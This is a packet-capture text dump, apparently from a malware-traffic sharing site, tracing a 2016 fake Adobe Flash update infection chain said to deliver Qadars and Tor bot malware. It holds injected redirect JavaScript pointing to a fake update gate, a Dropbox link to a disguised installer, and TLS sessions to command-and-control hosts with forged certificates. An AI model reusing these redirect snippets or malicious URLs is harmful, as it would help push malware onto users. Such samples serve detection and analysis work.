Fake Adobe Flash Player Update Binary Loads Qadars & Tor Bot Malware PCAP file download Traffic Sample

016-09-01 18:42:39.848166 IP 192.168.4.175.49440 > 82.194.88.80.80: Flags [P.], seq 1:250, ack 1, win 64800, length 249: HTTP: GET / HTTP/1.1
E..!/0@…Z=….R.XP. .Py……
P..  {..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: sinlabajos.com
Connection: Keep-Alive

2016-09-01 18:42:40.094526 IP 82.194.88.80.80 > 192.168.4.175.49440: Flags [.], ack 250, win 15544, length 0
E..(M.@.4…R.XP…..P. …
y…P.<…..
2016-09-01 18:42:42.211314 IP 82.194.88.80.80 > 192.168.4.175.49440: Flags [.], seq 1:1351, ack 250, win 15544, length 1350: HTTP: HTTP/1.1 200 OK
E..nM.@.4..eR.XP…..P. …
y…P.<.o…HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:47 GMT
Server: Apache
Set-Cookie: 97c4d18b9c1b1386940bcf59303c3d2c=f84c33ffa7536c4fe576320400047d19; path=/; HttpOnly
P3P: CP=”NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM”
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 01 Sep 2016 20:42:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
X-Powered-By: PleskLin
Content-Length: 7965
Connection: close
Content-Type: text/html; charset=utf-8

2016-09-01 18:42:45.303305 IP 192.168.4.175.49497 > 85.25.95.39.80: Flags [P.], seq 1:301, ack 1, win 16537, length 300: HTTP: GET /js/analytic.php?id=4 HTTP/1.1
E..T4.@…K1….U._’.Y.PJ..s…
P.@.._..GET /js/analytic.php?id=4 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://sinlabajos.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 4lmbkpqrklqv.net
Connection: Keep-Alive

2016-09-01 18:42:45.494614 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [.], ack 301, win 123, length 0
E..(..@.5…U._’…..P.Y…
J…P..{….
2016-09-01 18:42:48.726768 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [P.], seq 1:1229, ack 301, win 123, length 1228: HTTP: HTTP/1.1 200 OK
E…..@.5…U._’…..P.Y…
J…P..{.x..HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:56 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips
X-Powered-By: PHP/5.4.45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

2016-09-01 18:42:51.521801 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [P.], seq 1234:1603, ack 620, win 131, length 369: HTTP: HTTP/1.1 200 OK
E…..@.5..3U._’…..P.Y….J…P….E..HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:56 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips
X-Powered-By: PHP/5.4.45
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

6c
window.open(‘http://adobe-secur-update.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427’, ‘_self’);

2016-09-01 18:42:52.009085 IP 192.168.4.175.49510 > 69.64.36.212.80: Flags [P.], seq 1:311, ack 1, win 16537, length 310: HTTP: GET /update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427 HTTP/1.1
E..^9.@….8….E@$..f.P(*
….#P.@.p…GET /update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: adobe-secur-update.com
Connection: Keep-Alive

<script>
setTimeout(“location.href = ‘https://www.dropbox.com/s/rj644igtfr503cs/flashplayer22_me_install.exe?dl=1′;”, 1000);
$(function() {

2016-09-01 19:01:27.398866 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [P.], seq 1:168, ack 1, win 16537, length 167
E…5.@…f…………..]……P.@…………….W..-.~..     8.y…..J….?……..K..*.<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….K…………..j8le7s5q745e.org……….
…………………………….
2016-09-01 19:01:27.666128 IP 176.189.232.3.443 > 192.168.4.175.50071: Flags [P.], seq 1:80, ack 168, win 68, length 79
E..w;>@.r.o*……………..]..P..D……..J…F..
1.)….+Hn..C.f..:..@..<….M.. pl~…..E.~…2…..g…..S..U…=.
2016-09-01 19:01:27.666269 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [.], ack 80, win 16517, length 0
E..(5.@…g…………..]…..3P.@.r………
2016-09-01 19:01:27.849509 IP 176.189.232.3.443 > 192.168.4.175.50071: Flags [P.], seq 80:1121, ack 168, win 68, length 1041
E..9;?@.r.kg……………3.]..P..D……………….0…0………   ..u…8d.0..    *.H……..0..1.0       ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0…160411003559Z..170411003559Z0..1.0        ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0..”0..       *.H………….0..
…………t^g……..`C?B..R….O9.o]….#*.PI…i…..`e..Id=7..T.t.K..+.a2N\
..\$.OD<….|…..t….!P.u..p.D…OA…\……X….;..&..5.J..3.}.pTx……D…..c.z.N…-2….”qv)…@4..Xf:….T7.
@……3..s..2..&….w.o._.=F^%…….Z..H…^}cz…….j.-………P0N0…U……..$.l..9….q….c..0…U.#..0…..$.l..9….q….c..0…U….0….0..        *.H……………..+……QI….K$.KT.z13…….v…….|4nC0]..@.Y…..S……….A…t.0.(.kB….\bu*:…g…,..AeJ[E.Y.9..|_/..L.-…..N..5]]..j.”8..#.u……v..P(.C:-……’..+…:+&.*[T…U….?.,..o!…j..\V…R..>x.2….D7.-..q.7….W….>……_=z…V………D………..
2016-09-01 19:01:27.849663 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [.], ack 1121, win 16257, length 0
E..(5.@…g…………..]…..DP.?.o………

2016-09-01 19:02:37.162264 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [S], seq 3405242436, win 8192, options [mss 1464,nop,wscale 2,nop,nop,sackOK], length 0
E..46’@………>K.a…….D…… ..}…………..
2016-09-01 19:02:37.438269 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [S.], seq 3326033908, ack 3405242437, win 14600, options [mss 1350,nop,wscale 6,nop,nop,sackOK], length 0
E..4,F@.5.Fz>K.a………??….E..9……..F……..
2016-09-01 19:02:37.438392 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [.], ack 1, win 16537, length 0
E..(6)@………>K.a…….E.??.P.@.%p……..
2016-09-01 19:02:37.438829 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [P.], seq 1:199, ack 1, win 16537, length 198
E…6*@………>K.a…….E.??.P.@…………….W..sT3.383.:zZ..1p7…g…u….
..*.<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….j……..4.2../cfa8ed451f322249a33d9f877f75356c.konektyfor.com……….
…………………………….
2016-09-01 19:02:37.631759 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [.], ack 199, win 245, length 0
E..(..@.5…>K.a………??…..P…dN..
2016-09-01 19:02:37.631878 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [.], seq 1:1351, ack 199, win 245, length 1350
E..n..@.5…>K.a………??…..P…T#……Y…U..W…+C.”….8..H.8…I…..X…. ..f…..Q.Kv.@      …j[…(Lw..X..|……………………………0…0………        ..u…8d.0..    *.H……..0..1.0       ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0…160411003559Z..170411003559Z0..1.0        ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0..”0..       *.H………….0..
…………t^g……..`C?B..R….O9.o]….#*.PI…i…..`e..Id=7..T.t.K..+.a2N\

Leave a Reply